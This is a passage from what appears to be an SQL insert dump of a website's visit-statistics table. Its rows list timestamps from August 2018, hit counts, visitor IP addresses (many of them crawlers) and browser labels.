8.29.198.26','other'),(286763,1534083341,1,1,0,0,'185.220.101.30','other'),(286764,1534083857,3,3,0,0,'141.8.142.74','other'),(286765,1534083887,1,1,0,0,'216.244.66.241','other'),(286766,1534083980,1,1,0,0,'54.36.149.22','other'),(286767,1534084202,1,1,0,0,'54.36.148.103','other'),(286768,1534084315,1,1,0,0,'54.36.148.94','other'),(286769,1534084334,1,1,0,0,'54.36.148.116','other'),(286770,1534084717,1,1,0,0,'178.154.171.88','other'),(286771,1534084722,1,1,0,0,'87.250.224.46','other'),(286772,1534084960,1,1,0,0,'54.36.148.159','other'),(286773,1534084991,1,1,0,0,'54.36.148.107','other'),(286774,1534085070,1,1,0,0,'54.36.148.232','other'),(286775,1534085159,1,1,0,0,'216.244.66.241','other'),(286776,1534085378,1,1,0,0,'54.36.148.64','other'),(286777,1534085403,1,1,0,0,'54.36.148.81','other'),(286778,1534085693,2,2,0,0,'91.196.178.184','chrome'),(286779,1534085810,1,1,0,0,'180.76.15.13','other'),(286780,1534085842,1,1,0,0,'54.36.149.30','other'),(286781,1534085930,1,0,1,0,'66.249.66.59',''),(286782,1534085981,1,1,0,0,'54.36.148.29','other'),(286783,1534085989,1,1,0,0,'54.36.149.26','other'),(286784,1534086045,1,1,0,0,'54.36.148.36','other'),(286785,1534086391,1,1,0,0,'54.36.148.92','other'),(286786,1534086645,1,1,0,0,'157.55.39.90','other'),(286787,1534086897,1,1,0,0,'54.36.149.10','other'),(286788,1534086944,1,1,0,0,'145.239.90.27','other'),(286789,1534087158,1,1,0,0,'216.244.66.241','other'),(286790,1534087227,1,1,0,0,'54.36.148.90','other'),(286791,1534087720,1,1,0,0,'54.36.148.60','other'),(286792,1534088706,1,1,0,0,'54.36.149.37','other'),(286793,1534088839,1,1,0,0,'54.36.149.99','other'),(286794,1534088914,1,1,0,0,'54.36.148.210','other'),(286795,1534089243,1,1,0,0,'54.36.149.101','other'),(286796,1534089523,1,1,0,0,'54.36.148.214','other'),(286797,1534089685,1,1,0,0,'54.165.59.7','other'),(286798,1534089701,1,1,0,0,'54.36.148.178','other'),(286799,1534090137,1,1,0,0,'54.36.149.9','other'),(286800,1534090182,1,1,0,0,'54.36.148.228','other'),(286801,1534090636,1,1,0,0,'54.36.148.99','other'),(286802,1534090657,1,1,0,0,'54.36.148.127','other'),(286803,1534091480,1,1,0,0,'40.77.167.70','other'),(286804,1534091745,1,1,0,0,'8.29.198.25','other'),(286805,1534092190,1,1,0,0,'37.9.113.182','other'),(286806,1534092451,1,1,0,0,'54.36.148.40','other'),(286807,1534092776,1,1,0,0,'54.36.148.143','other'),(286808,1534093071,1,1,0,0,'54.36.148.222','other'),(286809,1534093156,1,1,0,0,'54.36.148.188','other'),(286810,1534093508,1,1,0,0,'207.46.13.87','other'),(286811,1534093877,1,1,0,0,'8.29.198.26','other'),(286812,1534094218,1,1,0,0,'54.36.148.56','other'),(286813,1534094480,1,1,0,0,'54.36.148.159','other'),(286814,1534094645,1,1,0,0,'91.196.178.88','chrome'),(286815,1534095012,1,1,0,0,'54.36.148.139','other'),(286816,1534095234,1,1,0,0,'92.113.189.235','chrome'),(286817,1534095309,1,1,0,0,'54.36.148.16','other'),(286818,1534095339,1,1,0,0,'54.36.148.229','other'),(286819,1534095863,1,1,0,0,'54.36.148.32','other'),(286820,1534095873,1,1,0,0,'180.76.15.7','other'),(286821,1534096127,1,1,0,0,'54.36.148.204','other'),(286822,1534096219,1,1,0,0,'54.36.149.45','other'),(286823,1534096905,3,3,0,0,'141.8.142.74','other'),(286824,1534096955,1,1,0,0,'54.36.149.23','other'),(286825,1534097235,1,1,0,0,'54.36.148.101','other'),(286826,1534097462,2,2,0,0,'54.36.148.99','other'),(286827,1534097561,1,1,0,0,'54.36.148.75','other'),(286828,1534097589,1,1,0,0,'54.36.149.91','other'),(286829,1534097748,1,1,0,0,'185.220.101.7','other'),(286830,1534097904,1,1,0,0,'207.46.13.233','other'),(286831,1534097973,1,1,0,0,'54.36.148.98','other'),(286832,1534098014,1,1,0,0,'54.36.149.60','other'),(286833,1534098094,1,1,0,0,'95.216.5.188','other'),(286834,1534098309,1,1,0,0,'51.255.65.46','other'),(286835,1534098411,1,1,0,0,'141.8.142.74','other'),(286836,1534098427,1,1,0,0,'54.36.148.168','other'),(286837,1534098553,1,0,1,0,'66.249.66.157',''),(286838,1534098586,1,1,0,0,'54.36.149.74','other'),(286839,1534098678,1,1,0,0,'54.36.148.214','other'),(286840,1534098879,1,1,0,0,'54.36.148.17','other'),(286841,1534098941,1,1,0,0,'178.92.156.186','chrome'),(286842,1534098961,1,1,0,0,'54.36.148.119','other'),(286843,1534099329,1,1,0,0,'54.36.149.104','other'),(286844,1534099505,1,1,0,0,'54.36.148.11','other'),(286845,1534099677,2,2,0,0,'141.8.142.74','other'),(286846,1534100354,1,1,0,0,'54.36.149.5','other'),(286847,1534100599,1,1,0,0,'54.36.148.46','other'),(286848,1534100941,1,1,0,0,'54.36.148.65','other'),(286849,1534101032,1,1,0,0,'54.36.148.32','other'),(286850,1534101103,1,1,0,0,'54.36.148.162','other'),(286851,1534101128,1,1,0,0,'54.36.148.188','other'),(286852,1534101182,1,1,0,0,'54.36.148.170','other'),(286853,1534101525,1,1,0,0,'54.36.148.139','other'),(286854,1534101596,1,1,0,0,'54.36.149.31','other'),(286855,1534101967,1,1,0,0,'178.154.171.88','other'),(286856,1534102029,1,1,0,0,'54.36.149.6','other'),(286857,1534102479,1,1,0,0,'54.36.148.57','other'),(286858,1534102589,1,1,0,0,'8.29.198.26','other'),(286859,1534103199,1,1,0,0,'54.36.149.23','other'),(286860,1534103229,1,1,0,0,'207.46.13.87','other'),(286861,1534103386,1,1,0,0,'54.36.148.112','other'),(286862,1534103577,1,0,1,0,'66.249.66.155',''),(286863,1534104162,1,1,0,0,'54.36.148.189','other'),(286864,1534104698,1,1,0,0,'93.170.116.23','chrome'),(286865,1534104716,1,1,0,0,'8.29.198.26','other'),(286866,1534104783,1,1,0,0,'54.36.149.53','other'),(286867,1534104921,1,1,0,0,'54.36.149.105','other'),(286868,1534104923,1,1,0,0,'54.36.148.17','other'),(286869,1534104942,1,1,0,0,'51.15.80.14','other'),(286870,1534104952,1,1,0,0,'54.36.148.246','other'),(286871,1534105609,1,1,0,0,'141.8.142.50','other'),(286872,1534105717,1,0,1,0,'66.249.66.61',''),(286873,1534105723,1,1,0,0,'54.36.148.51','other'),(286874,1534106470,1,1,0,0,'216.244.66.241','other'),(286875,1534106645,1,1,0,0,'37.9.113.157','other'),(286876,1534107309,1,1,0,0,'5.45.207.82','other'),(286877,1534107394,1,1,0,0,'54.36.148.138','other'),(286878,1534107804,1,1,0,0,'54.36.148.186','other'),(286879,1534107812,1,1,0,0,'54.36.148.97','other'),(286880,1534107922,1,1,0,0,'54.36.148.88','other'),(286881,1534108072,1,1,0,0,'54.36.149.91','other'),(286882,1534108268,1,1,0,0,'54.36.148.248','other'),(286883,1534108317,1,1,0,0,'54.36.148.219','other'),(286884,1534108335,1,1,0,0,'54.36.149.50','other'),(286885,1534108537,1,1,0,0,'54.36.148.254','other'),(286886,1534108644,1,1,0,0,'54.36.149.19','other'),(286887,1534108645,1,1,0,0,'54.36.148.55','other'),(286888,1534108737,1,1,0,0,'54.36.149.82','other'),(286889,1534108913,1,1,0,0,'95.163.255.165','other'),(286890,1534109186,1,1,0,0,'54.36.149.73','other'),(286891,1534109388,1,1,0,0,'54.36.148.210','other'),(286892,1534109552,1,1,0,0,'54.36.148.27','other'),(286893,1534109999,1,1,0,0,'54.36.148.51','other'),(286894,1534110177,1,1,0,0,'54.36.148.153','other'),(286895,1534110598,1,1,0,0,'54.36.149.77','other'),(286896,1534110767,1,1,0,0,'54.36.148.54','other'),(286897,1534110783,1,1,0,0,'54.36.149.95','other'),(286898,1534110824,1,1,0,0,'54.36.149.106','other'),(286899,1534110979,1,1,0,0,'54.36.148.155','other'),(286900,1534110989,1,1,0,0,'54.36.148.208','other'),(286901,1534111049,1,1,0,0,'46.211.117.3','chrome'),(286902,1534111078,1,0,1,0,'66.249.66.156',''),(286903,1534111282,1,1,0,0,'54.36.148.202','other'),(286904,1534111625,3,3,0,0,'178.154.171.88','other'),(286905,1534111650,1,1,0,0,'192.151.152.98','other'),(286906,1534111965,1,1,0,0,'157.55.39.225','other'),(286907,1534112081,1,1,0,0,'54.36.148.40','other'),(286908,1534112273,1,1,0,0,'54.36.148.82','other'),(286909,1534112567,1,1,0,0,'54.36.148.34','other'),(286910,1534113246,1,1,0,0,'54.36.148.57','other'),(286911,1534113368,1,1,0,0,'54.36.148.234','other'),(286912,1534113439,1,1,0,0,'8.29.198.25','other'),(286913,1534113661,1,1,0,0,'141.8.142.74','other'),(286914,1534114137,1,1,0,0,'54.36.148.215','other'),(286915,1534114138,1,1,0,0,'157.55.39.90','other'),(286916,1534114808,1,1,0,0,'54.36.148.123','other'),(286917,1534114868,1,1,0,0,'54.36.148.32','other'),(286918,1534115108,1,1,0,0,'54.36.148.226','other'),(286919,1534115443,1,1,0,0,'54.36.149.3','other'),(286920,1534115453,1,1,0,0,'54.36.149.71','other'),(286921,1534115552,1,1,0,0,'8.29.198.27','other'),(286922,1534115563,1,1,0,0,'54.36.148.88','other'),(286923,1534115754,1,1,0,0,'37.187.94.86','other'),(286924,1534115956,1,1,0,0,'54.36.148.233','other'),(286925,1534116427,1,1,0,0,'54.36.148.128','other'),(286926,1534116455,1,1,0,0,'54.36.148.79','other'),(286927,1534116574,1,1,0,0,'54.36.148.211','other'),(286928,1534117133,1,1,0,0,'54.36.148.32','other'),(286929,1534117193,1,1,0,0,'180.76.15.134','other'),(286930,1534117300,2,2,0,0,'141.8.142.74','other'),(286931,1534117323,1,1,0,0,'178.154.171.88','other'),(286932,1534117648,1,1,0,0,'54.36.149.27','other'),(286933,1534117669,1,1,0,0,'54.36.149.100','other'),(286934,1534118208,1,1,0,0,'157.55.39.90','other'),(286935,1534118918,1,1,0,0,'54.36.148.113','other'),(286936,1534119079,1,1,0,0,'54.36.148.47','other'),(286937,1534119361,2,2,0,0,'178.154.171.88','other'),(286938,1534119478,1,1,0,0,'54.36.149.22','other'),(286939,1534119490,1,1,0,0,'54.36.149.91','other'),(286940,1534119743,1,1,0,0,'157.55.39.90','other'),(286941,1534119856,1,1,0,0,'54.36.148.142','other'),(286942,1534119886,1,1,0,0,'54.36.148.248','other'),(286943,1534119932,1,1,0,0,'141.8.142.74','other'),(286944,1534120515,1,1,0,0,'54.36.148.198','other'),(286945,1534120768,1,0,1,0,'66.249.66.155',''),(286946,1534120780,1,1,0,0,'54.36.149.62','other'),(286947,1534120973,1,1,0,0,'178.154.171.88','other'),(286948,1534121233,1,1,0,0,'216.244.66.241','other'),(286949,1534122290,1,1,0,0,'54.36.148.224','other'),(286950,1534122812,1,1,0,0,'54.36.148.218','other'),(286951,1534122851,1,1,0,0,'54.36.148.69','other'),(286952,1534122906,1,1,0,0,'54.36.149.104','other'),(286953,1534122934,1,1,0,0,'51.15.15.79','other'),(286954,1534123205,1,0,1,0,'66.249.66.59',''),(286955,1534123352,1,1,0,0,'54.36.148.43','other'),(286956,1534123725,1,1,0,0,'54.36.149.81','other'),(286957,1534124004,1,1,0,0,'54.36.148.221','other'),(286958,1534124005,1,1,0,0,'54.36.148.217','other'),(286959,1534124282,1,1,0,0,'8.29.198.25','other'),(286960,1534124374,1,1,0,0,'54.36.148.59','other'),(286961,1534124539,2,2,0,0,'141.8.142.74','other'),(286962,1534125376,1,1,0,0,'54.36.148.151','other'),(286963,1534125948,1,1,0,0,'141.8.142.74','other'),(286964,1534126202,1,1,0,0,'54.36.148.230','other'),(286965,1534126338,1,1,0,0,'54.36.149.90','other'),(286966,1534126386,1,1,0,0,'8.29.198.26','other'),(286967,1534126533,1,1,0,0,'93.115.95.207','other'),(286968,1534126683,1,1,0,0,'54.36.148.213','other'),(286969,1534126923,1,1,0,0,'91.196.178.85','firefox'),(286970,1534127107,1,1,0,0,'54.36.148.159','other'),(286971,1534127159,1,1,0,0,'54.36.148.75','other'),(286972,1534127276,1,1,0,0,'54.36.148.19','other'),(286973,1534127277,1,1,0,0,'54.36.148.210','other'),(286974,1534127338,1,1,0,0,'54.36.149.68','other'),(286975,1534127410,1,1,0,0,'216.244.66.241','other'),(286976,1534127557,1,1,0,0,'52.34.24.33','chrome'),(286977,1534128013,1,1,0,0,'92.113.189.235','chrome'),(286978,1534128052,1,1,0,0,'54.36.149.83','other'),(286979,1534128101,2,2,0,0,'141.8.142.74','other'),(286980,1534128445,1,1,0,0,'54.36.148.162','other'),(286981,1534128483,1,1,0,0,'54.36.148.174','other'),(286982,1534128531,1,0,1,0,'66.249.66.156',''),(286983,1534128558,1,1,0,0,'54.36.148.121','other'),(286984,1534128686,1,0,1,0,'66.249.66.155',''),(286985,1534128814,1,1,0,0,'54.36.149.99','other'),(286986,1534128860,1,1,0,0,'54.36.149.85','other'),(286987,1534129385,1,1,0,0,'157.55.39.225','other'),(286988,1534129390,1,1,0,0,'54.36.148.69','other'),(286989,1534129669,1,1,0,0,'54.36.148.216','other'),(286990,1534129830,1,1,0,0,'141.8.142.74','other'),(286991,1534129937,1,1,0,0,'54.36.148.103','other'),(286992,1534130052,1,1,0,0,'216.244.66.241','other'),(286993,1534130058,3,3,0,0,'46.211.159.211','chrome'),(286994,1534130129,1,1,0,0,'185.220.101.25','other'),(286995,1534130225,1,1,0,0,'54.36.148.145','other'),(286996,1534130607,1,1,0,0,'51.254.209.128','chrome'),(286997,1534130826,1,1,0,0,'54.36.149.100','other'),(286998,1534130872,1,1,0,0,'54.36.149.3','other'),(286999,1534130908,1,1,0,0,'54.36.148.66','other'),(287000,1534130924,1,1,0,0,'54.36.148.237','other'),(287001,1534131647,1,1,0,0,'178.154.171.88','other'),(287002,1534131844,1,0,1,0,'66.249.66.157',''),(287003,1534131853,1,1,0,0,'95.163.255.99','other'),(287004,1534132009,1,1,0,0,'54.36.148.255','other'),(287005,1534132152,1,1,0,0,'54.36.148.109','other'),(287006,1534132177,1,1,0,0,'54.36.149.43','other'),(287007,1534132194,1,1,0,0,'54.36.148.207','other'),(287008,1534132248,1,1,0,0,'54.36.148.187','other'),(287009,1534132656,1,1,0,0,'141.8.142.74','other'),(287010,1534132720,2,2,0,0,'118.98.73.91','firefox'),(287011,1534132907,1,1,0,0,'54.36.149.0','other'),(287012,1534133158,1,1,0,0,'54.36.148.191','other'),(287013,1534133225,1,1,0,0,'54.36.149.98','other'),(287014,1534133240,1,1,0,0,'54.36.148.236','other'),(287015,1534133720,1,1,0,0,'54.36.148.223','other'),(287016,1534133740,1,1,0,0,'95.130.12.33','other'),(287017,1534133874,1,1,0,0,'54.36.149.97','other'),(287018,1534134062,1,1,0,0,'54.36.148.132','other'),(287019,1534134245,1,1,0,0,'54.36.148.37','other'),(287020,1534134392,1,0,1,0,'66.249.66.61',''),(287021,1534134544,2,2,0,0,'178.154.171.88','other'),(287022,1534135118,1,1,0,0,'8.29.198.26','other'),(287023,1534135207,1,1,0,0,'54.36.148.245','other'),(287024,1534135339,1,1,0,0,'141.8.142.74','other'),(287025,1534135713,1,1,0,0,'157.55.39.90','other'),(287026,1534136073,1,1,0,0,'54.36.148.131','other'),(287027,1534136215,1,1,0,0,'178.154.171.88','other'),(287028,1534136344,1,1,0,0,'54.36.149.53','other'),(287029,1534136357,1,1,0,0,'188.230.43.254','other'),(287030,1534136380,1,1,0,0,'54.36.149.93','other'),(287031,1534136650,1,1,0,0,'54.36.148.251','other'),(287032,1534136867,1,1,0,0,'54.36.148.130','other'),(287033,1534137212,1,1,0,0,'8.29.198.27','other'),(287034,1534137247,1,1,0,0,'216.244.66.241','other'),(287035,1534137323,1,1,0,0,'54.36.148.127','other'),(287036,1534137348,1,1,0,0,'185.220.101.21','other'),(287037,1534137400,1,1,0,0,'54.36.149.26','other'),(287038,1534137709,1,1,0,0,'54.36.148.250','other'),(287039,1534138109,1,1,0,0,'54.36.148.62','other'),(287040,1534138187,1,1,0,0,'37.9.113.157','other'),(287041,1534138190,1,1,0,0,'178.154.200.28','other'),(287042,1534138411,1,1,0,0,'54.36.148.190','other'),(287043,1534138420,27,27,0,0,'88.198.69.233','other'),(287044,1534138488,1,1,0,0,'54.36.149.20','other'),(287045,1534139522,1,1,0,0,'216.244.66.241','other'),(287046,1534140133,1,1,0,0,'54.36.148.36','other'),(287047,1534140927,1,1,0,0,'185.220.101.13','other'),(287048,1534141005,1,1,0,0,'54.36.149.51','other'),(287049,1534141273,1,1,0,0,'54.36.149.81','other'),(287050,1534141381,1,1,0,0,'194.44.237.194','firefox'),(287051,1534141437,1,1,0,0,'54.36.148.19','other'),(287052,1534141549,1,0,1,0,'66.249.66.156',''),(287053,1534141569,1,1,0,0,'54.36.148.31','other'),(287054,1534141641,1,1,0,0,'195.230.119.59','chrome'),(287055,1534141670,1,1,0,0,'54.36.148.90','other'),(287056,1534142099,1,1,0,0,'141.8.142.74','other'),(287057,1534142144,1,1,0,0,'54.36.148.162','other'),(287058,1534142195,1,1,0,0,'54.36.148.156','other'),(287059,1534142378,1,1,0,0,'91.209.11.236','other'),(287060,1534142587,1,1,0,0,'216.244.66.241','other'),(287061,1534142666,1,1,0,0,'54.166.149.27','other'),(287062,1534142710,1,1,0,0,'91.196.178.88','chrome'),(287063,1534142795,1,1,0,0,'54.36.148.239','other'),(287064,1534142933,1,1,0,0,'54.36.149.2','other'),(287065,1534143171,1,1,0,0,'54.36.149.48','other'),(287066,1534143262,1,1,0,0,'162.210.196.98','other'),(287067,1534143294,2,2,0,0,'91.196.178.71','chrome'),(287068,1534143391,1,1,0,0,'54.36.148.100','other'),(287069,1534143543,1,1,0,0,'54.36.148.156','other'),(287070,1534143596,1,1,0,0,'31.13.114.146','other'),(287071,1534143599,1,1,0,0,'31.13.125.54','other'),(287072,1534143713,1,1,0,0,'173.252.98.24','other'),(287073,1534143727,1,1,0,0,'91.196.178.88','chrome'),(287074,1534143736,1,1,0,0,'54.36.148.76','other'),(287075,1534143762,1,1,0,0,'109.237.94.27','chrome'),(287076,1534143789,1,1,0,0,'130.180.212.54','firefox'),(287077,1534143795,1,1,0,0,'46.211.114.223','other'),(287078,1534143801,1,1,0,0,'46.211.80.18','chrome'),(287079,1534143803,1,1,0,0,'94.244.18.38','other'),(287080,1534143819,1,1,0,0,'46.133.157.111','chrome'),(287081,1534143826,1,1,0,0,'54.36.149.12','other'),(287082,1534143831,1,1,0,0,'91.196.178.135','chrome'),(287083,1534143865,2,2,0,0,'91.196.178.103','chrome'),(287084,1534143880,1,1,0,0,'37.52.16.245','chrome'),(287085,1534143886,1,1,0,0,'37.73.233.100','other'),(287086,1534143888,1,1,0,0,'78.111.189.196','other'),(287087,1534143912,1,1,0,0,'51.255.65.46','other'),(287088,1534143922,1,1,0,0,'31.13.114.7','other'),(287089,1534143955,1,1,0,0,'157.55.39.90','other'),(287090,1534144001,1,1,0,0,'66.102.9.27','chrome'),(287091,1534144002,1,1,0,0,'37.54.115.205','chrome'),(287092,1534144019,1,1,0,0,'95.134.202.123','other'),(287093,1534144029,1,1,0,0,'188.163.11.7','chrome'),(287094,1534144076,24,24,0,0,'144.76.40.222','other'),(287095,1534144079,1,1,0,0,'93.180.179.184','other'),(287096,1534144141,1,1,0,0,'37.73.48.90','chrome'),(287097,1534144146,2,2,0,0,'95.132.50.167','chrome'),(287098,1534144150,1,1,0,0,'95.132.49.223','chrome'),(287099,1534144169,1,1,0,0,'78.111.189.37','chrome'),(287101,1534144192,1,1,0,0,'37.73.164.4','other'),(287102,1534144200,1,1,0,0,'92.112.125.65','chrome'),(287103,1534144246,1,1,0,0,'95.135.91.86','other'),(287104,1534144268,2,2,0,0,'95.134.203.26','chrome'),(287105,1534144353,1,1,0,0,'178.154.171.88','other'),(287106,1534144354,1,1,0,0,'66.220.152.98','other'),(287107,1534144367,1,1,0,0,'212.113.42.16','chrome'),(287108,1534144413,1,1,0,0,'91.196.178.178','chrome'),(287109,1534144430,1,1,0,0,'46.211.116.237','other'),(287110,1534144450,1,1,0,0,'54.36.149.69','other'),(287111,1534144507,1,1,0,0,'37.73.14.95','chrome'),(287112,1534144531,1,1,0,0,'217.182.52.248','other'),(287113,1534144539,1,1,0,0,'178.176.112.116','other'),(287114,1534144551,1,1,0,0,'94.178.147.170','chrome'),(287115,1534144554,1,1,0,0,'46.211.25.172','chrome'),(287116,1534144567,1,1,0,0,'91.196.122.212','other'),(287117,1534144637,4,4,0,0,'91.196.178.81','chrome'),(287118,1534144664,1,1,0,0,'95.135.91.129','chrome'),(287119,1534144740,1,1,0,0,'46.211.205.27','chrome'),(287120,1534144763,1,1,0,0,'91.231.229.42','other'),(287121,1534144861,1,1,0,0,'178.133.17.65','chrome'),(287122,1534144947,1,0,1,0,'66.249.66.155',''),(287123,1534144955,1,1,0,0,'176.130.102.135','other'),(287124,1534144958,1,1,0,0,'173.252.90.165','other'),(287125,1534144984,1,1,0,0,'91.196.178.71','chrome'),(287126,1534145025,1,1,0,0,'54.36.148.244','other'),(287127,1534145069,1,1,0,0,'91.196.178.175','chrome'),(287128,1534145202,1,1,0,0,'141.8.142.74','other'),(287129,1534145365,1,1,0,0,'91.196.178.102','chrome'),(287130,1534145417,1,1,0,0,'91.196.177.98','other'),(287131,1534145427,2,2,0,0,'178.154.171.88','other'),(287132,1534145430,1,1,0,0,'37.73.125.147','chrome'),(287133,1534145438,1,1,0,0,'54.36.148.124','other'),(287134,1534145519,1,1,0,0,'91.196.178.41','chrome'),(287135,1534145548,1,1,0,0,'216.244.66.241','other'),(287136,1534145647,1,1,0,0,'31.13.111.85','other'),(287137,1534145684,1,1,0,0,'46.133.196.101','chrome'),(287138,1534145750,1,1,0,0,'54.36.148.180','other'),(287139,1534145770,1,1,0,0,'178.95.67.23','chrome'),(287140,1534145820,1,1,0,0,'54.36.149.87','other'),(287141,1534145908,1,1,0,0,'54.36.149.91','other'),(287142,1534145967,1,1,0,0,'193.41.129.90','other'),(287143,1534145968,1,1,0,0,'8.29.198.26','other'),(287144,1534146000,1,1,0,0,'54.36.149.65','other'),(287145,1534146025,1,1,0,0,'37.55.237.152','other'),(287146,1534146032,1,1,0,0,'94.179.208.163','chrome'),(287147,1534146051,1,1,0,0,'95.163.255.115','other'),(287148,1534146058,1,1,0,0,'95.163.255.104','other'),(287149,1534146159,1,1,0,0,'69.171.225.64','other'),(287150,1534146167,1,1,0,0,'46.133.1.136','other'),(287151,1534146230,1,1,0,0,'82.207.121.233','chrome'),(287152,1534146321,1,1,0,0,'54.36.149.49','other'),(287153,1534146434,1,1,0,0,'91.196.178.99','chrome'),(287154,1534146464,1,1,0,0,'46.211.49.20','other'),(287155,1534146544,1,1,0,0,'66.249.81.59','chrome'),(287156,1534146589,1,1,0,0,'46.174.166.76','chrome'),(287157,1534146704,1,1,0,0,'54.36.149.85','other'),(287158,1534146720,1,1,0,0,'37.73.144.15','chrome'),(287159,1534146761,1,1,0,0,'185.209.70.7','other'),(287160,1534146789,1,1,0,0,'91.196.178.81','chrome'),(287161,1534146791,1,1,0,0,'31.43.31.187','firefox'),(287162,1534146794,1,1,0,0,'46.211.26.207','chrome'),(287163,1534146851,1,1,0,0,'46.211.114.224','other'),(287164,1534146909,1,1,0,0,'87.250.224.46','other'),(287165,1534146938,1,1,0,0,'91.196.178.93','chrome'),(287166,1534147037,1,1,0,0,'91.196.178.87','other'),(287167,1534147039,1,1,0,0,'173.252.122.140','other'),(287168,1534147053,1,1,0,0,'37.47.237.174','chrome'),(287169,1534147074,1,1,0,0,'54.36.148.166','other'),(287170,1534147095,1,1,0,0,'185.191.204.6','chrome'),(287171,1534147126,1,1,0,0,'54.36.149.102','other'),(287172,1534147197,1,1,0,0,'78.111.186.10','firefox'),(287173,1534147262,1,1,0,0,'91.196.177.193','chrome'),(287174,1534147288,1,1,0,0,'91.196.178.97','chrome'),(287175,1534147347,1,1,0,0,'37.73.143.26','chrome'),(287176,1534147349,1,1,0,0,'37.73.111.8','chrome'),(287177,1534147357,1,1,0,0,'174.199.35.152','other'),(287178,1534147392,1,1,0,0,'216.244.66.241','other'),(287179,1534147411,1,1,0,0,'193.93.78.9','other'),(287180,1534147423,1,1,0,0,'37.73.238.91','chrome'),(287181,1534147515,1,1,0,0,'37.73.181.200','other'),(287182,1534147541,1,1,0,0,'37.73.141.239','other'),(287183,1534147657,1,1,0,0,'37.73.215.119','chrome'),(287184,1534147815,1,1,0,0,'54.36.149.32','other'),(287185,1534147865,1,1,0,0,'109.251.205.35','other'),(287186,1534148019,1,1,0,0,'37.73.73.169','other'),(287187,1534148040,1,1,0,0,'54.36.149.50','other'),(287188,1534148045,1,1,0,0,'8.29.198.25','other'),(287189,1534148061,1,1,0,0,'37.73.168.247','chrome'),(287190,1534148076,1,1,0,0,'46.211.41.214','chrome'),(287191,1534148114,1,1,0,0,'130.180.209.199','other'),(287192,1534148122,1,1,0,0,'31.13.113.71','other'),(287193,1534148129,1,1,0,0,'46.211.115.227','other'),(287194,1534148133,1,1,0,0,'217.147.169.49','other'),(287195,1534148136,1,1,0,0,'91.196.178.99','chrome'),(287196,1534148163,1,1,0,0,'54.36.149.1','other'),(287197,1534148194,1,1,0,0,'91.196.178.189','chrome'),(287198,1534148339,1,1,0,0,'54.36.149.84','other'),(287199,1534148408,1,1,0,0,'54.36.148.249','other'),(287200,1534148461,1,1,0,0,'37.73.238.91','chrome'),(287201,1534148559,1,1,0,0,'31.13.113.192','other'),(287202,1534148605,1,1,0,0,'91.196.178.71','chrome'),(287203,1534148655,1,1,0,0,'91.196.178.80','chrome'),(287204,1534148657,1,1,0,0,'62.205.134.182','msie'),(287205,1534148781,1,1,0,0,'91.196.178.97','other'),(287206,1534148785,1,1,0,0,'91.196.177.193','chrome'),(287207,1534148928,1,1,0,0,'37.73.0.133','other'),(287208,1534149181,1,1,0,0,'176.106.0.244','other'),(287209,1534149542,1,1,0,0,'37.73.180.140','chrome'),(287210,1534149629,1,1,0,0,'46.211.86.0','other'),(287211,1534149656,1,1,0,0,'31.13.124.51','other'),(287212,1534149669,1,1,0,0,'91.196.178.85','chrome'),(287213,1534149785,1,1,0,0,'178.93.125.230','chrome'),(287214,1534149847,1,1,0,0,'46.211.27.120','other'),(287215,1534149863,1,1,0,0,'176.36.102.152','other'),(287216,1534149928,1,1,0,0,'94.178.147.32','chrome'),(287217,1534149941,1,1,0,0,'46.211.159.18','other'),(287218,1534150104,1,1,0,0,'46.133.217.145','other'),(287219,1534150204,1,1,0,0,'178.95.247.130','chrome'),(287220,1534150290,1,1,0,0,'46.133.75.140','chrome'),(287221,1534150369,1,1,0,0,'31.13.125.119','other'),(287222,1534150448,1,1,0,0,'94.179.146.164','chrome'),(287223,1534150476,1,1,0,0,'54.36.148.243','other'),(287224,1534150490,1,1,0,0,'54.36.148.83','other'),(287225,1534150500,1,1,0,0,'141.8.142.74','other'),(287226,1534150549,1,1,0,0,'178.154.171.88','other'),(287227,1534150588,1,1,0,0,'54.36.148.129','other'),(287228,1534150608,1,1,0,0,'54.36.149.82','other'),(287229,1534150757,1,1,0,0,'46.211.140.227','chrome'),(287230,1534150830,1,1,0,0,'91.196.178.99','chrome'),(287231,1534150981,1,1,0,0,'66.220.151.240','other'),(287232,1534151067,1,1,0,0,'77.111.244.26','chrome'),(287233,1534151122,1,1,0,0,'52.53.201.78','chrome'),(287234,1534151181,1,1,0,0,'207.46.13.87','other'),(287235,1534151214,1,1,0,0,'91.196.177.147','chrome'),(287236,1534151242,1,1,0,0,'54.36.148.193','other'),(287237,1534151252,1,1,0,0,'178.133.102.175','chrome'),(287238,1534151291,1,1,0,0,'91.196.121.11','other'),(287239,1534151545,1,1,0,0,'95.67.71.250','other'),(287240,1534151579,1,1,0,0,'195.88.158.126','other'),(287241,1534151594,1,1,0,0,'54.36.149.56','other'),(287242,1534151631,1,1,0,0,'54.36.149.10','other'),(287243,1534151642,1,1,0,0,'91.196.178.71','chrome'),(287244,1534151708,1,1,0,0,'178.92.73.139','chrome'),(287245,1534151745,1,1,0,0,'54.36.148.153','other'),(287246,1534151852,1,1,0,0,'31.13.124.50','other'),(287247,1534151910,1,1,0,0,'46.211.105.195','chrome'),(287248,1534152011,1,1,0,0,'54.36.148.58','other'),(287249,1534152180,2,2,0,0,'54.36.148.249','other'),(287250,1534152228,1,1,0,0,'92.112.105.115','other'),(287251,1534152238,1,1,0,0,'91.196.177.46','other'),(287252,1534152316,1,1,0,0,'91.196.177.46','chrome'),(287253,1534152346,1,1,0,0,'31.13.112.141','other'),(287254,1534152354,1,1,0,0,'91.196.177.11','other'),(287255,1534152367,1,1,0,0,'91.196.178.77','firefox'),(287256,1534152368,1,1,0,0,'141.8.142.74','other'),(287257,1534152389,1,1,0,0,'91.196.178.48','other'),(287258,1534152691,1,1,0,0,'178.95.156.174','chrome'),(287259,1534152695,1,1,0,0,'180.76.15.34','other'),(287260,1534152705,1,1,0,0,'130.180.212.229','other'),(287261,1534152848,1,1,0,0,'37.73.249.7','other'),(287262,1534152897,1,1,0,0,'31.13.124.205','other'),(287263,1534152964,1,1,0,0,'78.111.189.196','other'),(287264,1534152975,1,1,0,0,'54.36.148.169','other'),(287265,1534153016,1,1,0,0,'54.36.149.79','other'),(287266,1534153025,1,1,0,0,'91.196.178.71','chrome'),(287267,1534153165,1,1,0,0,'91.196.178.99','chrome'),(287268,1534153310,1,1,0,0,'94.179.146.164','chrome'),(287269,1534153332,1,1,0,0,'37.73.98.30','other'),(287270,1534153539,1,1,0,0,'37.73.174.171','other'),(287271,1534153920,1,1,0,0,'54.36.149.50','other'),(287272,1534154295,1,1,0,0,'91.196.177.193','chrome'),(287273,1534154339,1,1,0,0,'54.36.148.101','other'),(287274,1534154414,1,1,